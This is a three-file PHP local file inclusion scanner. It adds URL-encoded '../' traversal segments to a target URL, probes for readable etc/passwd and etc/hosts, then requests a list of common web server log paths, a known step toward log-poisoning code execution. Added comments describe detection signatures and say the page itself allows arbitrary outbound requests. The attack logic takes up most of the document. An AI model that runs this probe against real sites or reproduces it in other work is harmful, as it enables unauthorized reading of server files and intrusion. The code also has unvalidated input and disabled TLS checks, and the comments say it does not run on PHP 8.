  1. //Lfi.php - Main file
  2.  
  3. <?php
  4.  
    //LFI probe driver: prepends URL-encoded "../" segments to the URL given in
    //?u= and reports the first depth at which etc/passwd or etc/hosts is readable.
    //
    //Hosting note: $url is read from the query string without any validation, so
    //this page, wherever it is reachable, lets any caller drive outbound requests
    //to arbitrary URLs through this server.
    //
    //Detection: every probe request carries a run of "..%2F" followed by
    //"etc/passwd" or "etc/hosts" (and later the log paths from dirs.php) in its
    //query string, a high-signal pattern for WAF rules and access-log review on
    //the probed host.
   
    require("funcs.php");   //getBody, getResponseSize, searchPasswd, searchHosts, testLogs
    require("dirs.php");    //defines $logsDir (global), read by testLogs() below
    $url = $_GET['u'];      //target URL exactly as supplied by the caller
 
    define(LIM, 10);    //Limit of ../ to check (the loop below runs $c = 1..9)
    define(RET, "..%2F");  //one URL-encoded "../" segment
    //NOTE(review): LIM and RET on the two lines above are bare identifiers, not
    //quoted strings; PHP 8 throws Error "Undefined constant" here (PHP 5/7 only
    //warned and used the name as a string), so this file does not run as-is on
    //current PHP.
   
    $toInject = $url;
   
   
           
    //Main loop to append ../ : depth 1 through LIM-1, stopping at the first hit
    for($c = 1; $c < LIM; $c++){
        $toInject = $toInject.RET; //Url with one more ../ appended
       
        $passwdTest = searchPasswd($toInject);  //probe URL on a hit, otherwise null
        $hostsTest = searchHosts($toInject);    //same, for etc/hosts
       
        if($passwdTest || $hostsTest){
            echo $passwdTest."    ".$hostsTest;
            testLogs($toInject, $logsDir);   //prints one response size per path in $logsDir
            die;                              //the first successful depth ends the run
            }
           
    }
  32.  
  33. ?>
  34.  
//funcs.php - Functions file
  36.  
  37. <?php
  38.  
  39. //This functions returns body of $url
  40.     function getBody($url){
  41.         $ch = curl_init();
  42.         curl_setopt($ch, CURLOPT_URL, $url);
  43.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  44.         curl_setopt($ch, CURLOPT_VERBOSE, 1);
  45.         curl_setopt($ch, CURLOPT_HEADER, 1);
  46.         curl_setopt($ch, CURLOPT_USERAGENT, $ua);
  47.         curl_setopt($ch, CURLOPT_FAILONERROR, True);
  48.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
  49.         curl_setopt($ch, CURLOPT_AUTOREFERER, True);
  50.         curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  51.         curl_setopt($ch, CURLOPT_ENCODING, '');
  52.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  53.        
  54.         $body = curl_exec($ch);
  55.        
  56.         return $body;
  57.         }
  58.        
  59.     //This functions returns response size
  60.     function getResponseSize($url){
  61.         $ch = curl_init();
  62.         curl_setopt($ch, CURLOPT_URL, $url);
  63.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  64.         curl_setopt($ch, CURLOPT_VERBOSE, 1);
  65.         curl_setopt($ch, CURLOPT_HEADER, 1);
  66.         curl_setopt($ch, CURLOPT_USERAGENT, $ua);
  67.         curl_setopt($ch, CURLOPT_FAILONERROR, True);
  68.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
  69.         curl_setopt($ch, CURLOPT_AUTOREFERER, True);
  70.         curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  71.         curl_setopt($ch, CURLOPT_ENCODING, '');
  72.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  73.        
  74.         curl_exec($ch);
  75.         $info = curl_getinfo($ch);
  76.        
  77.         return $info['size_download'];
  78.         }
  79.        
    //Checks whether etc/passwd is readable through the traversal prefix in $url:
    //fetches $url."etc/passwd" and looks for the canonical root entry in the
    //response (headers + body, see getBody). On a hit it returns the full probe
    //URL; otherwise it falls off the end and returns null.
    //Detection: the resulting request ends in "etc/passwd" after the "..%2F" run.
    function searchPasswd($url){
        $passwd = "etc/passwd";
        $nb = "%00";                  //null-byte suffix: assigned but unused (concatenation is commented out below)
        $toReq = $url.$passwd;//.$nb;
        $root = "root:x:0:0:root:/root:/bin/bash";   //marker string searched for in the response
        $body = getBody($toReq);      //string, or false when the transfer failed
        //echo $toReq."<br>";
       
        //the match offset from strpos() is used directly as the condition
        if(strpos($body, $root)) return $toReq;//echo $toReq."<br>";
           
       
    }
  93.    
    //Checks whether etc/hosts is readable through the traversal prefix in $url:
    //fetches $url."etc/hosts" and requires both "127.0.0.1" and "localhost" to
    //appear in the response (headers + body, see getBody). On a hit it returns
    //the full probe URL; otherwise it falls off the end and returns null.
    //Detection: the resulting request ends in "etc/hosts" after the "..%2F" run.
    function searchHosts($url){
        $hosts = "etc/hosts";  
        $nb = "%00";                  //null-byte suffix: assigned but unused (concatenation is commented out below)
        $toReq = $url.$hosts;//.$nb;
       
        $ip = "127.0.0.1";            //both markers must be present for a hit
        $host = "localhost";
        $body = getBody($toReq);      //string, or false when the transfer failed
       
       
        //the match offsets from strpos() are used directly as the condition
        if(strpos($body, $ip)   && strpos($body, $host)) return $toReq;//echo $toReq."<br>";
           
    }
  108.    
    //Prints, one per line, the response size of $url followed by each path in
    //$logsDir. It only reports sizes: it makes no decision and returns nothing.
    //$logsDir is taken by reference although it is only read.
    //Detection: this issues count($logsDir) requests in quick succession, each
    //ending in one of the log paths listed in dirs.php.
    function testLogs($url, &$logsDir){
        echo "<br>";
        foreach ($logsDir as $dir):
            $currentTest = $url.$dir;   //Url with returns with log appended
            echo getResponseSize($currentTest)."<br>";
        endforeach;
    }
  116. ?>
  117.  
//dirs.php - This file contains common web server log file paths
  119.  
  120. <?php
  121.  
  122. //This file contains an array with common logs directories
  123. $logsDir = array('error.log',
  124.                 'error_log',
  125.                 'etc/httpd/conf/logs/error_log',
  126.                 'etc/httpd/logs/error_log',
  127.                 'home/php5/logs/error_log',
  128.                 'log/error.log',
  129.                 'log/error_log',
  130.                 'logs/error.log',
  131.                 'logs/error_log',
  132.                 'usr/local/apache/error.log',
  133.                 'usr/local/apache/log/error_log',
  134.                 'usr/local/apache/logs/error_log',
  135.                 'usr/local/apache2/log/error_log',
  136.                 'usr/local/apache2/logs/access_log',
  137.                 'usr/local/apache2/logs/error.log',
  138.                 'usr/local/apache2/logs/error_log',
  139.                 'usr/local/apachessl/logs/error_log',
  140.                 'usr/local/httpd/log/error_log',
  141.                 'usr/local/httpd/logs/error_log',
  142.                 'usr/local/php/log/error_log',
  143.                 'var/apache2/logs/access_log',
  144.                 'var/apache2/logs/error_log',
  145.                 'var/log/apache/error_log',
  146.                 'var/log/apache2/access.log',
  147.                 'var/log/apache2/access_log',
  148.                 'var/log/apache2/error.log',
  149.                 'var/log/apache2/error_log',
  150.                 'var/log/httpd-access.log',
  151.                 'var/log/httpd-error.log',
  152.                 'var/log/httpd/access_log',
  153.                 'var/log/httpd/error_log',
  154.                 'var/log/nginx/error.log',
  155.                 'var/log/php-fcgi/error_log',
  156.                 'var/log/php-fpm/err.log',
  157.                 'var/www/logs/access_log',
  158.                 'var/www/logs/error_log');
  159. ?>